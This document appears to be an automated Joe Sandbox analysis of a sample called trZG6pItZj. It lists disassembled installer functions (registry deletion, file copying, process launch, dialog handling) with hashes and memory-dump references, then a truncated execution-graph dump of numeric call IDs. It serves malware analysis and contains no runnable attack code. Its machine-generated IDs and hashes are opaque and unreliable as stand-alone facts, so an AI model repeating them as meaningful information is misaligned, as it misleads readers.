• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: Version
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                    • String ID: !N~
                                                                                                                                                                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                    Execution Coverage:3.5%
                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                    Signature Coverage:3.4%
                                                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:58
96307->96308 96309 e4014b 8 API calls 96307->96309 96311 e31695 96307->96311 96313 e3049d ISource 96307->96313 96314 e7625a 96307->96314 96317 e75cdb 96307->96317 96319 e2bed9 8 API calls 96307->96319 96322 e2bf73 8 API calls 96307->96322 96323 e40413 29 API calls pre_c_initialization 96307->96323 96324 e76115 96307->96324 96325 e30aae ISource 96307->96325 96326 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96307->96326 96358 e31990 96307->96358 96420 e31e50 96307->96420 96433 e93fe1 81 API calls __wsopen_s 96308->96433 96309->96307 96311->96313 96318 e2bed9 8 API calls 96311->96318 96313->96304 96432 e93fe1 81 API calls __wsopen_s 96314->96432 96317->96313 96321 e2bed9 8 API calls 96317->96321 96318->96313 96319->96307 96321->96313 96322->96307 96323->96307 96430 e93fe1 81 API calls __wsopen_s 96324->96430 96431 e93fe1 81 API calls __wsopen_s 96325->96431 96326->96307 96329 e2be38 96328->96329 96330 e2be67 96329->96330 97251 e2bfa5 96329->97251 96330->96304 96332->96304 96333->96304 96334->96304 96336 e4014b 8 API calls 96335->96336 96337 e3bc65 96336->96337 96338 e2b329 8 API calls 96337->96338 96339 e3bc70 96338->96339 96339->96304 96340->96304 96341->96304 96342->96304 96343->96304 96344->96283 96345->96300 96346->96304 96348 e2b4d6 96347->96348 96350 e2b4dc 96347->96350 96349 e2bed9 8 API calls 96348->96349 96348->96350 96349->96350 96350->96304 96351->96304 96353 e2befc __fread_nolock 96352->96353 96354 e2beed 96352->96354 96353->96304 96354->96353 96355 e4017b 8 API calls 96354->96355 96355->96353 96356->96300 96357->96287 96359 e319b6 96358->96359 96360 e31a2e 96358->96360 96362 e319c3 96359->96362 96363 e76b60 96359->96363 96361 e76a4d 96360->96361 96380 e31a3d 96360->96380 96365 e76b54 96361->96365 96366 e76a58 96361->96366 96372 e76b84 96362->96372 96374 e319cd 96362->96374 96440 ea85db 207 API calls 2 library calls 96363->96440 96439 e93fe1 81 API calls __wsopen_s 96365->96439 96438 e3b35c 207 API calls 
96366->96438 96367 e30340 207 API calls 96367->96380 96370 e76bb5 96375 e76be2 96370->96375 96376 e76bc0 96370->96376 96371 e31b62 ISource 96377 e319e0 ISource 96371->96377 96397 e2bed9 8 API calls 96371->96397 96400 e31a23 ISource 96371->96400 96372->96370 96379 e76b9c 96372->96379 96373 e31ba9 96393 e31bb5 96373->96393 96435 e93fe1 81 API calls __wsopen_s 96373->96435 96374->96377 96378 e2bed9 8 API calls 96374->96378 96443 ea60e6 96375->96443 96442 ea85db 207 API calls 2 library calls 96376->96442 96387 e76dd9 96377->96387 96377->96400 96517 ea808f 53 API calls __wsopen_s 96377->96517 96378->96377 96441 e93fe1 81 API calls __wsopen_s 96379->96441 96380->96367 96380->96373 96380->96377 96381 e76979 96380->96381 96384 e76908 96380->96384 96380->96393 96405 e31af4 96380->96405 96437 e93fe1 81 API calls __wsopen_s 96381->96437 96436 e93fe1 81 API calls __wsopen_s 96384->96436 96390 e76e0f 96387->96390 96541 ea81ce 65 API calls 96387->96541 96396 e2b4c8 8 API calls 96390->96396 96392 e76c81 96515 e91ad8 8 API calls 96392->96515 96393->96307 96394 e76db7 96518 e28ec0 96394->96518 96396->96400 96397->96377 96399 e76ded 96403 e28ec0 52 API calls 96399->96403 96400->96307 96402 e76c08 96450 e9148b 96402->96450 96417 e76df5 _wcslen 96403->96417 96405->96373 96434 e31ca0 8 API calls 96405->96434 96407 e76c93 96516 e2bd07 8 API calls 96407->96516 96408 e7691d ISource 96408->96371 96408->96381 96408->96400 96409 e31b55 96409->96371 96409->96373 96412 e76dbf _wcslen 96412->96387 96415 e2b4c8 8 API calls 96412->96415 96414 e76c9c 96419 e9148b 8 API calls 96414->96419 96415->96387 96417->96390 96418 e2b4c8 8 API calls 96417->96418 96418->96390 96419->96377 96424 e31e6d ISource 96420->96424 96421 e32512 96428 e31ff7 ISource 96421->96428 97250 e3be08 39 API calls 96421->97250 96424->96421 96425 e77837 96424->96425 96426 e7766b 96424->96426 96424->96428 97248 e3e322 8 API calls ISource 96424->97248 96425->96428 97249 e4d2d5 39 API calls 96425->97249 97247 e4d2d5 39 API calls 
96426->97247 96428->96307 96430->96325 96431->96313 96432->96313 96433->96313 96434->96409 96435->96400 96436->96408 96437->96377 96438->96371 96439->96363 96440->96377 96441->96400 96442->96377 96444 e76bed 96443->96444 96445 ea6101 96443->96445 96444->96392 96444->96402 96542 e4017b 96445->96542 96448 ea6123 96448->96444 96551 e4014b 96448->96551 96560 e91400 8 API calls 96448->96560 96451 e91499 96450->96451 96452 e76c32 96450->96452 96451->96452 96453 e4014b 8 API calls 96451->96453 96454 e32b20 96452->96454 96453->96452 96455 e32fc0 96454->96455 96456 e32b86 96454->96456 96714 e405b2 5 API calls __Init_thread_wait 96455->96714 96458 e32ba0 96456->96458 96459 e77bd8 96456->96459 96567 e33160 96458->96567 96677 ea7af9 96459->96677 96461 e32fca 96464 e3300b 96461->96464 96715 e2b329 96461->96715 96463 e77be4 96463->96377 96469 e77bed 96464->96469 96471 e3303c 96464->96471 96467 e33160 9 API calls 96468 e32bc6 96467->96468 96468->96464 96470 e32bfc 96468->96470 96724 e93fe1 81 API calls __wsopen_s 96469->96724 96470->96469 96495 e32c18 __fread_nolock 96470->96495 96472 e2b4c8 8 API calls 96471->96472 96474 e33049 96472->96474 96722 e3e6e8 207 API calls 96474->96722 96475 e32fe4 96721 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96475->96721 96477 e77c15 96725 e93fe1 81 API calls __wsopen_s 96477->96725 96480 e32d3f 96481 e77c78 96480->96481 96482 e32d4c 96480->96482 96727 ea61a2 53 API calls _wcslen 96481->96727 96483 e33160 9 API calls 96482->96483 96485 e32d59 96483->96485 96491 e33160 9 API calls 96485->96491 96501 e32dd7 ISource 96485->96501 96486 e4014b 8 API calls 96486->96495 96487 e33082 96723 e3fe39 8 API calls 96487->96723 96488 e4017b 8 API calls 96488->96495 96490 e32f2d 96490->96377 96499 e32d73 96491->96499 96492 e330bd 96492->96377 96494 e30340 207 API calls 96494->96495 96495->96474 96495->96477 96495->96480 96495->96486 96495->96488 96495->96494 96496 e77c59 96495->96496 96495->96501 96726 e93fe1 81 API calls __wsopen_s 
96496->96726 96497 e33160 9 API calls 96497->96501 96499->96501 96503 e2bed9 8 API calls 96499->96503 96501->96487 96501->96497 96502 e32e8b ISource 96501->96502 96577 ea9fe8 96501->96577 96580 eaa5b2 96501->96580 96586 ea9ffc 96501->96586 96589 eaa9ac 96501->96589 96597 e9f94a 96501->96597 96606 e3ac3e 96501->96606 96625 ea0fb8 96501->96625 96650 eaa6aa 96501->96650 96658 eaad47 96501->96658 96663 ea1858 96501->96663 96670 e9664c 96501->96670 96728 e93fe1 81 API calls __wsopen_s 96501->96728 96502->96490 96713 e3e322 8 API calls ISource 96502->96713 96503->96501 96515->96407 96516->96414 96517->96394 96519 e28ed2 96518->96519 96520 e28ed5 96518->96520 96519->96412 96521 e28f0b 96520->96521 96522 e28edd 96520->96522 96524 e66b1f 96521->96524 96527 e28f1d 96521->96527 96533 e66a38 96521->96533 97243 e45536 26 API calls 96522->97243 97246 e454f3 26 API calls 96524->97246 96525 e28eed 96531 e4014b 8 API calls 96525->96531 97244 e3fe6f 51 API calls 96527->97244 96528 e66b37 96528->96528 96532 e28ef7 96531->96532 96534 e2b329 8 API calls 96532->96534 96535 e4017b 8 API calls 96533->96535 96540 e66ab1 96533->96540 96534->96519 96536 e66a81 96535->96536 96537 e4014b 8 API calls 96536->96537 96538 e66aa8 96537->96538 96539 e2b329 8 API calls 96538->96539 96539->96540 97245 e3fe6f 51 API calls 96540->97245 96541->96399 96543 e4014b ___std_exception_copy 96542->96543 96544 e4016a 96543->96544 96547 e4016c 96543->96547 96561 e4521d 7 API calls 2 library calls 96543->96561 96544->96448 96546 e409dd 96563 e43614 RaiseException 96546->96563 96547->96546 96562 e43614 RaiseException 96547->96562 96550 e409fa 96550->96448 96552 e40150 ___std_exception_copy 96551->96552 96553 e4016a 96552->96553 96555 e4016c 96552->96555 96564 e4521d 7 API calls 2 library calls 96552->96564 96553->96448 96556 e409dd 96555->96556 96565 e43614 RaiseException 96555->96565 96566 e43614 RaiseException 96556->96566 96559 e409fa 96559->96448 96560->96448 96561->96543 96562->96546 96563->96550 96564->96552 
96565->96556 96566->96559 96568 e331a1 96567->96568 96569 e3317d 96567->96569 96729 e405b2 5 API calls __Init_thread_wait 96568->96729 96576 e32bb0 96569->96576 96731 e405b2 5 API calls __Init_thread_wait 96569->96731 96572 e331ab 96572->96569 96730 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96572->96730 96574 e39f47 96574->96576 96732 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96574->96732 96576->96467 96733 ea89b6 96577->96733 96579 ea9ff8 96579->96501 96582 eaa5c5 96580->96582 96581 e28ec0 52 API calls 96583 eaa632 96581->96583 96582->96581 96585 eaa5d4 96582->96585 96873 e918a9 96583->96873 96585->96501 96587 ea89b6 119 API calls 96586->96587 96588 eaa00c 96587->96588 96588->96501 96591 eaaa08 96589->96591 96596 eaa9c8 96589->96596 96590 eaaa26 96592 e2c98d 39 API calls 96590->96592 96594 eaaa8e 96590->96594 96590->96596 96591->96590 96949 e2c98d 96591->96949 96592->96594 96917 e90372 96594->96917 96596->96501 96598 e4017b 8 API calls 96597->96598 96599 e9f95b 96598->96599 96994 e2423c 96599->96994 96602 e28ec0 52 API calls 96603 e9f97c GetEnvironmentVariableW 96602->96603 96997 e9160f 8 API calls 96603->96997 96605 e9f999 ISource 96605->96501 96607 e28ec0 52 API calls 96606->96607 96608 e3ac68 96607->96608 96609 e3bc58 8 API calls 96608->96609 96610 e3ac7f 96609->96610 96611 e2c98d 39 API calls 96610->96611 96612 e3b09b _wcslen 96610->96612 96611->96612 96613 e44d98 _strftime 40 API calls 96612->96613 96615 e26c03 8 API calls 96612->96615 96616 e3bbbe 43 API calls 96612->96616 96619 e3b1fb 96612->96619 96620 e28ec0 52 API calls 96612->96620 96622 e2c98d 39 API calls 96612->96622 96998 e2396b 96612->96998 97008 e23907 96612->97008 97012 e27ad5 96612->97012 97017 e2ad40 8 API calls __fread_nolock 96612->97017 97018 e27b1a 8 API calls 96612->97018 97019 e28577 96612->97019 96613->96612 96615->96612 96616->96612 96619->96501 96620->96612 96622->96612 96626 ea0fe1 96625->96626 96627 ea100f WSAStartup 96626->96627 
